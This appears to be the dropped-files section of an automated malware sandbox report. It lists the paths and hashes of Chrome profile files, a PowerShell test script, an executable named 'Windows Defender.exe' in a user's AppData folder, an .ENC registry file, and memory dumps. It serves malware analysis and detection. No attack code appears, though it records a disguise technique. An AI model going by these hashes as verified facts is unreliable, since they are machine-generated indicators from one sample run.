C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt

Filesize
125B

MD5
a976931d91bdc0238fae002980f2cadb

SHA1
3fae942c65f4f2efa67277564ec3a2241e63de1f

SHA256
8795219e34480bba1ef76a6e48a349ec812b0b175ce78d07f036515769dadd6e

SHA512
5ad695c035610b0ab64c9037801ec59c1dd425a283ff19042f78d7b5745d3772fb03918830a9551713badddb0d56c427d2f61964a6ece876c965855dc2b91219

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Service Worker\CacheStorage\379f1cbab5b08b6fc9e08681e42d8be311441c88\index.txt~RFe57b7f6.TMP

Filesize
120B

MD5
48fe762dfa6d811942880ae86dc42fc6

SHA1
23ab1ac0667266393ed99f0fce3a0eaf920f109e

SHA256
3cb2822f26cfd0b561a7e48e8524057d7de51715d1911c838ac0436f4428500d

SHA512
054318e4005f67a4d494dcca84f2cf5f0568986041433513c839853d7fdc0a4a9a91fff718d5917fe7f2cb28212acf5f438066bf77454ca43a62fd8b149e5b74

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
0d1fbc139399a60391ac20f134ce1b73

SHA1
8b4316f8eca0ebe222f75f958801fe312d174f9b

SHA256
936c60476b9ed526f7cd2df2f2e230a92a3f9aa49d57a335d09d559fb6b7af04

SHA512
852aaa3bc484ed3709026b89ac26aa49fef5703f8c120acc6cf41fffda4574638ce18292ccf230080959d9c452afaa5d7ed10b835814a0c039b4924ed14a666f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe580a0d.TMP

Filesize
48B

MD5
3416cda3cc59e34974d7de77277a91eb

SHA1
349395bc94754a8671c53e8a46a1a0ebc651f464

SHA256
ae18f58efbd6dc44fc61eb6b63a0c67c7629f8a898b254de2456d97dfcb81c90

SHA512
84d7a358e882aaa61c0300d20e04d627a056c281fec36a83c88c905f41a1aeeb74f39fa10a89f3a97f0938aae4b461a41a73ca5e5e63a56066eb413068741de4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Default\Visited Links

Filesize
128KB

MD5
a9e61ecbcc643b0ba28da2dbc7362444

SHA1
53e2872e97a320b00de9efa4c246816c3f36fc7a

SHA256
7d2fdb4852de976df9653dd591514a3c06306e139017a5c23168c5bea460b84c

SHA512
da1639ce59e5251379e63584eddc623caec3d451ab2001a49aafccea540cda6f777a3280fd7bf8248e9d88e2c920bcda6671e5bdf7f00e8296f1aa738467d5c4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\GrShaderCache\data_0

Filesize
8KB

MD5
cf89d16bb9107c631daabf0c0ee58efb

SHA1
3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

SHA256
d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

SHA512
8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\GrShaderCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\GrShaderCache\data_3

Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Last Version

Filesize
14B

MD5
9eae63c7a967fc314dd311d9f46a45b7

SHA1
caba9c2c93acfe0b9ceb9ab19b992b0fc19c71cf

SHA256
4288925b0cf871c7458c22c46936efb0e903802feb991a0e1803be94ca6c251d

SHA512
bed924bff236bf5b6ce1df1db82e86c935e5830a20d9d24697efd82ca331e30604db8d04b0d692ec8541ec6deb2225bcc7d805b79f2db5726642198ecf6348b8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Local State

Filesize
74KB

MD5
5dbebf4659541690ee7acec9e566a93b

SHA1
1641b9d5187eb26f802a72cd7bf553401a2bcff2

SHA256
7e7f37d2ba2afbdf43e88700ddae547c6425f51a958a56837b77237b5c79fc64

SHA512
2ef160617552d1bbb64bb064a75b0a784bfdfd799b4e53ddaa364cb008412029c0a65b5ab4521a1c2b2962205d26ce37b086df74b8d9462e1abf70dc1c8ea83b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Local State

Filesize
142KB

MD5
7b83d28b5af3de2dd6f18f94406d72b7

SHA1
50d4ce6fe7b7caea14436e17aaa4c0653ef389d1

SHA256
ff6d6b3cd85a693ab1be5ea18fc2ad1c8d2a1e37f30997531b0f9f5e74e34fc6

SHA512
012f70ce970a45324af3355fe2a9e23807772857edcd012e5768733ce3b60eab18d1f6f29e7cce766c262072520b6fea6510be32d2566d5b328b61fb84b8a0ef

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Local State

Filesize
74KB

MD5
1bf2c7c1bb4178df94a89885a7dcad90

SHA1
d6b407c9a6d0686898e2d9aa7e6966caa793b407

SHA256
69624a69092144961592bf4d49102a6386ae330d8ffb8f53143412c7f170d1c3

SHA512
d888cefc946d09e75b623b7b140194a0494795ee1de6c625fef882004bf2893c7e7cb29cd941157b3ba437869a536686621aedcd33dfe465e7bf2b0f8c5d5c27

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Module Info Cache

Filesize
98KB

MD5
4f05b968d03d4e3afd5cb612d054df79

SHA1
4a812aed6fa4e2d364f376e95a185404ad6b390b

SHA256
9d023c5b4b7221629e8650ac046a7faa2a81a134239a56c9c5050d3a1b72fce9

SHA512
d9abe90e19fe7c987b80928f650a67e3e857b72f2170eeeec9b783d8e88b821afbebb8055042f322926e08e13e257c0f29c56e3fa4a02cb0479c020682152e79

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Variations

Filesize
86B

MD5
f732dbed9289177d15e236d0f8f2ddd3

SHA1
53f822af51b014bc3d4b575865d9c3ef0e4debde

SHA256
2741df9ee9e9d9883397078f94480e9bc1d9c76996eec5cfe4e77929337cbe93

SHA512
b64e5021f32e26c752fcba15a139815894309b25644e74ceca46a9aa97070bca3b77ded569a9bfd694193d035ba75b61a8d6262c8e6d5c4d76b452b38f5150a4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
52957d4bf2f5b79a0cf7b42e9eb1a954

SHA1
c6ca0bc3ebd37a4a7a99b3ec8b4cc29368c5fac5

SHA256
373963e79b7dd7a50576b9bf92f1a5c356e30bad53e25c44d245dfcc2f869d6b

SHA512
90f957c13fe611b314c501d6cff5fa6d747ce1bb67d32b73997292c6c846c516e509ca76351f827bfaefe80960d4ba8ee89ac7a2a9330f4741f6dce9b4170036

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_0

Filesize
44KB

MD5
a2e9470a7498794b13e6136efa289c3b

SHA1
0119fc2c938add1ead060866e09f0bc6463aecea

SHA256
501da582834b75cc1d930682ae599b5e5c6742cbc3485acbfe212eabf698a243

SHA512
83b58160973667263d0808faa41e0692f048785f11d0e0bc2aa29f7c8f5fb345a97e104c5809eda2f16a530131fe4779fa70c8461825cf879b400c9abc4dbd23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_1

Filesize
264KB

MD5
b6d25c46af93df425166bddcae56eb1f

SHA1
d607609e12eb2c56fb07bd7e199b4e91f7519cad

SHA256
444a081f1a5f69f5ef2ed6135b8f953adfe21b74812e39eca4373e51e36d6270

SHA512
e8dd676e38dd4707d86b9ddf254cba6a9337e673970697da6944f39c855a4ddd113e039bb223337001ed8cc32721bb9a29ec6c7c414fc43c0113a4748b7d27b7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_3

Filesize
4.0MB

MD5
8df1e86703f602dd9dbb910cdcfe50fa

SHA1
2ac45a31606180ec4566b1bb57120c549c9d81ae

SHA256
0ed9e3b3aaeec0e53392d5d91b5c2cace7c5345d7e8fa8a1e69cefdd1b1f5a9f

SHA512
0396ab6fcf250e1288e6133840ecc9c999642bdcb24f7c710d2111b67bdf33a0b7419bdb41ac168c4532160cc6fe1098590a6c8222143c192a66f17fc5c02dbf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000004

Filesize
37KB

MD5
186b679830aa3905dfbab304f32913a8

SHA1
a032f0d4ec5028457b3c0d83efb64356c252e1b1

SHA256
c5df78705bdd153a7683f27a4a5f074a88241cacc7271d0e5ee9c6c27c60d8d2

SHA512
144cff925f26442309fd732c083b9de0a43f8b5d307f3789cd9fcae19727e640529384b783da00f0441730c5aa7c2db73715576de076d0d0d85ca2c5e2ff4e24

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

Filesize
47KB

MD5
a1527b679f4e2808555b49e7d3dd9290

SHA1
667128343a768373c5bb305db960d9e684a10329

SHA256
8d024bbd9ca07f206a8432c16796c1a7d896658fc5244c4874df5408a998a78a

SHA512
fbc8e0e643e89ab520350265d87ae41a1e59549c997a20cce57249c18c9ecaf774843b8b12634a9ba8463c9954c18181bc9f8b95db984bcb2992da9e73ddc4d0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006

Filesize
37KB

MD5
d90cb261f4a509d886611473296e188e

SHA1
23551f9039c8b855b496f017c8f75b32f6e56671

SHA256
ca6c7cdd1e68e9f251fbf58e0b0ad9e883b38979e264c3cf4125f603b21c8bb4

SHA512
1cca6c9490c8f7adca7441ffea3e7445309d0c52fbaf7252e4c3c73525e00233a8173536c031747a55343bb86e96618d9c96afc6e4f8d25b0106729cca5c8031

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG

Filesize
317B

MD5
eb729f6bedaa9c6b1fa2864d30230fa8

SHA1
3043e3d8ed814481e4cdef15ee7b3b6be74262a6

SHA256
5a71231667f115c731711947d6897d3797e137cb4244ee491e12708ec0ef980d

SHA512
11ceb541e5dd73fb3c626a8f017efe9f3e92d48f09f9a0ac1638c2583bcf7e51e638fcaf03e6418d9170f5d186aa016ef6b1fe35a4427a3509a926ebffc8ff59

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOG

Filesize
327B

MD5
914007d44a5cc467ff6f9e071aaf3b64

SHA1
3f9ede6e061255c481b44e37af64c31f45d98ee2

SHA256
feef0ed0827117af62ffbfd34a0d56dbab920556c23f1ca8d77072cc03264fc7

SHA512
11c94dae0c1b06ccb0c8a1ec50a85346d619aa16b29ae0c5802d83fd80964d87dc37274e9a257ee8badd2859b039203184f650ea105f9eb0253d99199a069103

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG

Filesize
329B

MD5
dba79fa62fabe03a37335e394fb56b3e

SHA1
6fef77acb81e9d58a230ed709bdab9a72268fa6e

SHA256
e8f3efdaf72efe9be8d1fd7ab53c4c1272926cdcb917d093d61d28f90617c5a4

SHA512
4edfec1587b8c615185e80988817ef5a9caf85cf892a82f61844f44ce82915ca07a9970b1a4eb884d8556f2c01e682ade47c6e2844ca737393b390a4d526dfe8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
e43bf511d57e37a7c4abf80a569222de

SHA1
624616d86b593ce5af60993f797a836ebd210cb5

SHA256
7d5526dfdfd90e83cd6650bf45b8b442f96945eefabf0f0d017fba98e8d41fb6

SHA512
f444e18926e519dcefb8970c8e20c2a0859a4436ad9ecb65471392fb6d94ac6b7f33c413697e8543b6791b77b2c03501cd1dd4ce9e8747427aea7809750c2234

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL

Filesize
36KB

MD5
340f66dd1e97ef17e67cdd7c01a8b68a

SHA1
93a94da0fca5f034fc5f5ef4a2941cda3cf307c5

SHA256
7f761a7ce2d83ca54f9133e8bc7170bdee077fc3c8a999798e80371764a0fd3f

SHA512
b0293a239ad16724d79ad6adeebb7ff4db58cd282414d5f69b8c640383f17241d7f515e9102373173ec8d34d85b12e149d47bef12dadeac8dfc2e0276dd5e5cc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
371B

MD5
dce54641984d12e31febc350fcf32036

SHA1
061692fa57173c8da6fc82dbb78f93d96d0c7e0f

SHA256
e661a67f6bea8294e2ea49873d39efffbb768395f0becbc8788cd04a77eaf46e

SHA512
d0c2fe9267e1349977be0db1dea369f7e8fac5affd6334b7b276aad9554ffc0129652b3754ad9c3ce08faad09c5106e66bbc7f6e17bc4af4f7a9284da7e6d7e0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
371B

MD5
dce54641984d12e31febc350fcf32036

SHA1
061692fa57173c8da6fc82dbb78f93d96d0c7e0f

SHA256
e661a67f6bea8294e2ea49873d39efffbb768395f0becbc8788cd04a77eaf46e

SHA512
d0c2fe9267e1349977be0db1dea369f7e8fac5affd6334b7b276aad9554ffc0129652b3754ad9c3ce08faad09c5106e66bbc7f6e17bc4af4f7a9284da7e6d7e0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
0d85fb662a1c854dff7a011378a30079

SHA1
ef4b74b81711cbc5f6619462d5b08cba240fd777

SHA256
d22d6858a08e6e156b96b20ffcf97bbbba3459b5c046da600753ea237e7e7f50

SHA512
7d64a7ef50e950b876e775727c1bd035d22f15cdec138da54f360b94f57272d02067659cb24f121b56eee0543c48d1c9b68d7f41c2b607d38fd8be72e526589a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
0d85fb662a1c854dff7a011378a30079

SHA1
ef4b74b81711cbc5f6619462d5b08cba240fd777

SHA256
d22d6858a08e6e156b96b20ffcf97bbbba3459b5c046da600753ea237e7e7f50

SHA512
7d64a7ef50e950b876e775727c1bd035d22f15cdec138da54f360b94f57272d02067659cb24f121b56eee0543c48d1c9b68d7f41c2b607d38fd8be72e526589a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
1391d12bc41cc398f8ac75b8ac5d4b12

SHA1
6dfe358079565dd8f79c7a2c6a0dc0d113494126

SHA256
91219918d0edd75bb5a28fbb1c6687bb375b2259237baa538287b0ea251959cf

SHA512
65818574c8f62c8150cc332fcbcc24dad7bc9a1b1e7b79853128cedb997b958d917ffcddf3699ae4437a55d654f56bb9a71c7b1a17f8246a039a02ad61c91ba6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
a2c3e239a5a4b3c21763fe37489d22a8

SHA1
37b8c21c4d9de23aae6b2bfe77afe34a3743607d

SHA256
03b5899faf035113f6a16075017f5bb04fdc9f5e1c922f38bd693183d184aa5e

SHA512
fb3594226c76074aca95d8d7c38a26fd3a0e10d9405bb64bffce3437eeae673b5296f89fcdc6af91e74ba46f131f95d681dfaf067a28fe53dadf31c7255c48b7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
a2c3e239a5a4b3c21763fe37489d22a8

SHA1
37b8c21c4d9de23aae6b2bfe77afe34a3743607d

SHA256
03b5899faf035113f6a16075017f5bb04fdc9f5e1c922f38bd693183d184aa5e

SHA512
fb3594226c76074aca95d8d7c38a26fd3a0e10d9405bb64bffce3437eeae673b5296f89fcdc6af91e74ba46f131f95d681dfaf067a28fe53dadf31c7255c48b7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

Filesize
156B

MD5
fa1af62bdaf3c63591454d2631d5dd6d

SHA1
14fc1fc51a9b7ccab8f04c45d84442ed02eb9466

SHA256
00dd3c8077c2cca17ea9b94804490326ae6f43e6070d06b1516dfd5c4736d94d

SHA512
2c3184f563b9a9bff088114f0547f204ee1e0b864115366c86506215f42d7dbf161bc2534ccaee783e62cc01105edffc5f5dabf229da5ebd839c96af1d45de77

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG

Filesize
317B

MD5
c714118db24b6cd8191a5c7cf040f442

SHA1
aafcc44d9c6dfc398ced9077a5706c049a8c4182

SHA256
6ebef6659f35de339a449501db852e338186724d0f85bf063fd99a7db6d18500

SHA512
b4a00303a7f4894df43d1a7ce21c992807ade217d7b2ad9476c4f9d46b649f773da4e8e1f0689e04b28174240d91a02b4a064339bfa2d5b7f8a617d507f1b115

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG

Filesize
345B

MD5
24748dbe8501c6d3c7606e775c5d24dc

SHA1
9522befcf005bd9837f814075646a17ad017af6d

SHA256
0be2dbcfff04d75a9d2000a95bb893f30fcbfc3dbc5439c717224d93861b0564

SHA512
94facec17bb64d18a86f119090250cd283e32d01740c5abfc2e0f14a081dfa6d07660cf40fc60d51b2baeb2e7164e34c42b71c059173c9ad375f9ad202d198aa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log

Filesize
6KB

MD5
37e61104fd8be7a0410f09515d31e82b

SHA1
c9f9bd3f7ac0db202576c4ef42a043c895545f29

SHA256
522ec79a155122e6ae0afc1408fee5a6f9ca3b19e993e1e26dfb98b7253b223b

SHA512
25863e5cf64ee2ba62aad9a3149ed9887c6127f4bcf129740c245affdbe08a6e5fb91f87233481c876ee87fbf5a0a09a13967d765c2887bb4f62f398653d6e78

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG

Filesize
321B

MD5
95a8d274879c9582c62afb782d24d943

SHA1
b7f27515422b895f3e966dc05850502da88542c5

SHA256
e5d6eb021fb39c92c2bdbde16d068739f8f0057313cacefb9273fbb1b0846869

SHA512
343a675cca96982c965cf748b2643c0420e19e9866cd486406fab6d5abad402e8bd70538263e934901908990e70b3c988c77925df888849779012a87b1a5dc74

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log

Filesize
798B

MD5
d68097625740b9eec5f6b192565a669e

SHA1
d5f776976a198c731944510de155480f22a69723

SHA256
1bd2d5eb40987741f7c70e7b59d840573683db3aa2c237a3761187da0e13658d

SHA512
a363e64caa26d20e844b7a84b8bc0715540dd3fcca797be5b796931e5c5914a798e778eb37bd1530e65c8547474401b5899b4d7c49f6cd9f052a47ed003f62ba

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG

Filesize
317B

MD5
c24fa68ffee3f8302c1a195b8628b598

SHA1
fc2b6f7a59549d9b65019bd2e832210ec7b4a0eb

SHA256
834b12f2dd1262343916c900950b695a5b02fa88a77f3aea7ee6318eba534eb7

SHA512
329f516c27274a7b5ed9207d497017a60c9eda2e67de127c5e9cf5d4efbb0f9aa30e894118e78a1815c93d4338e7661e428994082cc392dbc342971865e493ed

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log

Filesize
821B

MD5
1f49049a9e2c6b4e42acc77a7addb4fe

SHA1
c1c57f8e3c74c9a5cfa352b609feef5efb905655

SHA256
c43d25a431e548e794033bc12136b1e256457a75e5badb96fda6d9a931022977

SHA512
72a953b4a64c5e3c837307c5faeb468abaf9d6414163ee0eacae51767cef59fe36de50b65aa985a688ea9d39430c40114b5bd5e022f828bf0ce8f87e3ed4b61d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOG

Filesize
335B

MD5
6e84689eb0d2f18d2127b06583103f43

SHA1
c0bb806cb4849fa3079272752d87768105affdff

SHA256
e97e194adb88f55372497900f1925bdf9d91462ab6ab9acfd7fc758f8cc38d38

SHA512
82d1ed0c777ed18fa4e8eadf1179f72c589db189decde2901df36b78c57898a4e4d300f139475e30f42c9e24c0f2db4dbd5a71aae27f1e4504b2ada605f0788e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Browser

Filesize
106B

MD5
de9ef0c5bcc012a3a1131988dee272d8

SHA1
fa9ccbdc969ac9e1474fce773234b28d50951cd8

SHA256
3615498fbef408a96bf30e01c318dac2d5451b054998119080e7faac5995f590

SHA512
cea946ebeadfe6be65e33edff6c68953a84ec2e2410884e12f406cac1e6c8a0793180433a7ef7ce097b24ea78a1fdbb4e3b3d9cdf1a827ab6ff5605da3691724

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

Filesize
14B

MD5
9eae63c7a967fc314dd311d9f46a45b7

SHA1
caba9c2c93acfe0b9ceb9ab19b992b0fc19c71cf

SHA256
4288925b0cf871c7458c22c46936efb0e903802feb991a0e1803be94ca6c251d

SHA512
bed924bff236bf5b6ce1df1db82e86c935e5830a20d9d24697efd82ca331e30604db8d04b0d692ec8541ec6deb2225bcc7d805b79f2db5726642198ecf6348b8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
142KB

MD5
7b83d28b5af3de2dd6f18f94406d72b7

SHA1
50d4ce6fe7b7caea14436e17aaa4c0653ef389d1

SHA256
ff6d6b3cd85a693ab1be5ea18fc2ad1c8d2a1e37f30997531b0f9f5e74e34fc6

SHA512
012f70ce970a45324af3355fe2a9e23807772857edcd012e5768733ce3b60eab18d1f6f29e7cce766c262072520b6fea6510be32d2566d5b328b61fb84b8a0ef

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
142KB

MD5
7b83d28b5af3de2dd6f18f94406d72b7

SHA1
50d4ce6fe7b7caea14436e17aaa4c0653ef389d1

SHA256
ff6d6b3cd85a693ab1be5ea18fc2ad1c8d2a1e37f30997531b0f9f5e74e34fc6

SHA512
012f70ce970a45324af3355fe2a9e23807772857edcd012e5768733ce3b60eab18d1f6f29e7cce766c262072520b6fea6510be32d2566d5b328b61fb84b8a0ef

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
96KB

MD5
0fd51564b38053d8aaf8fe65dddd879f

SHA1
1ffbde26055d9ff1e6b76a489cd93e5bedc37b94

SHA256
04b9613b6ac840dc00235f2de6a1182430ede646713b77b6378523b5e1b60237

SHA512
8c31054c0188c1792d3985aed4c76fdae671fc8a9e26094d40a79d1dd5fe0d9419adb880309171fb2d29d6aa13efeb8314b5ed118a5ea77cc07aa2428a395487

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations

Filesize
86B

MD5
961e3604f228b0d10541ebf921500c86

SHA1
6e00570d9f78d9cfebe67d4da5efe546543949a7

SHA256
f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed

SHA512
535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yztuufvs.nuk.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Defender.exe

Filesize
76KB

MD5
dcf97bdb41eb351d2fc4ea91f624423d

SHA1
d3715326aebfa2e71c1e7a56567fabfafb4728fa

SHA256
41754180b11159c68cf543787d84256a5dc2d1c567074cb13362c24d011df89f

SHA512
f017a7ce00f9d4b920e707ab8a41dc26975f54e28e2a0ed564e59b20cdd1785472e28848c1b8b5f0d5903ac7778277051c04a6a7e671685594d17d5b8f716491

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Defender.exe

Filesize
76KB

MD5
dcf97bdb41eb351d2fc4ea91f624423d

SHA1
d3715326aebfa2e71c1e7a56567fabfafb4728fa

SHA256
41754180b11159c68cf543787d84256a5dc2d1c567074cb13362c24d011df89f

SHA512
f017a7ce00f9d4b920e707ab8a41dc26975f54e28e2a0ed564e59b20cdd1785472e28848c1b8b5f0d5903ac7778277051c04a6a7e671685594d17d5b8f716491

Download Submit
C:\Users\Admin\AppData\Roaming\Windows Defender.exe

Filesize
76KB

MD5
dcf97bdb41eb351d2fc4ea91f624423d

SHA1
d3715326aebfa2e71c1e7a56567fabfafb4728fa

SHA256
41754180b11159c68cf543787d84256a5dc2d1c567074cb13362c24d011df89f

SHA512
f017a7ce00f9d4b920e707ab8a41dc26975f54e28e2a0ed564e59b20cdd1785472e28848c1b8b5f0d5903ac7778277051c04a6a7e671685594d17d5b8f716491

Download Submit
C:\Users\Admin\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000001.regtrans-ms.ENC

Filesize
16B

MD5
e7f15454126198e93e47f2bd737137ac

SHA1
0afb833981785563554bf299ffad615bb85ccdb6

SHA256
90c417d3ed831ef63716b188d33772d902d844e37a19745e5aacf33c0d200393

SHA512
ac728072d0d87fd33f800db98a4f9ffe89b7394221c6e59784286bb5e3b1161d1a4e222edf2400f4c69049a13fdaf8dfa975d72f3273cdc6593c13e11eae8f12

Download Submit
memory/1840-201-0x0000000002E10000-0x0000000002E46000-memory.dmp

Filesize
216KB

Download
memory/1840-204-0x0000000005760000-0x0000000005782000-memory.dmp

Filesize
136KB

Download
memory/1840-202-0x0000000005AA0000-0x00000000060C8000-memory.dmp

Filesize
6.2MB

Download
memory/1840-219-0x0000000006740000-0x000000000675E000-memory.dmp

Filesize
120KB

Download
memory/1840-212-0x0000000002EF0000-0x0000000002F00000-memory.dmp

Filesize
64KB

Download
memory/1840-211-0x0000000002EF0000-0x0000000002F00000-memory.dmp

Filesize
64KB

Download
memory/1840-205-0x0000000005A00000-0x0000000005A66000-memory.dmp

Filesize
408KB

Download
memory/3504-143-0x000000001C600000-0x000000001C610000-memory.dmp

Filesize
64KB

Download
memory/3504-134-0x000000001C600000-0x000000001C610000-memory.dmp

Filesize
64KB

Download
memory/3504-133-0x0000000000CF0000-0x0000000000D0A000-memory.dmp

Filesize
104KB

Download
memory/4284-195-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/4284-196-0x0000000005790000-0x0000000005822000-memory.dmp

Filesize
584KB

Download
memory/4284-197-0x00000000058D0000-0x000000000596C000-memory.dmp

Filesize
624KB

Download
memory/4284-198-0x0000000005F20000-0x00000000064C4000-memory.dmp

Filesize
5.6MB

Download
memory/4284-199-0x00000000054A0000-0x00000000054B0000-memory.dmp

Filesize
64KB

Download
memory/4284-200-0x0000000005B50000-0x0000000005BB6000-memory.dmp

Filesize
408KB
